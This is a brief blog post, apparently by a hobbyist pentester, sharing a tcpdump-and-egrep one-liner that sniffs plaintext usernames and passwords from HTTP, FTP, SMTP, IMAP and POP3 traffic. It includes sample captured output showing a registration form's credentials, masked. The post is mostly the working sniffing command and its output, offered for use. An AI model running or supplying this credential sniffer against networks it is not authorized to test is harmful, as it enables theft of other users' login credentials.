Quick and dirty tcpdump credential (username/password) sniffer
I’ve been playing the last months with mobile pentesting within the Android platform. As I’ve been able to setup tcpdump-arm on my android phone, I began fooling around with it. I was trying to cross-compile Dug Song’s dsniff into armle architechture but it was only giving me headaches within the libnet/libnids dependencies and stuff.
So I wrote a quick one-liner to dump potential credentials (username/password) flowing in plaintext over the line:
|
1
|
tcpdump port http or port ftp or port smtp or port imap or port pop3 -l -A | egrep -i 'pass=|pwd=|log=|login=|user=|username=|pw=|passw=|passwd=|password=|pass:|user:|username:|password:|login:|pass |user ' --color=auto --line-buffered -B20
|
And it works quite sufficiently:
|
1
2
3
4
5
6
7
8
9
|
.{D.ezENPOST /users/register HTTP/1.1
Host: www.commandlinefu.com
...
Referer: http://www.commandlinefu.com/users/register
...
Content-Type: application/x-www-form-urlencoded
Content-Length: 147
username=jseidl&password=MASKED&password-confirmation=MASKED&email-address=MASKED%MASKED.MASKEDhomepage=MASKED&submit=Sign+me+up
|
Its not BY FAR efficient as dsniff, but can help out sometimes!
[…] Source […]
[…] Source […]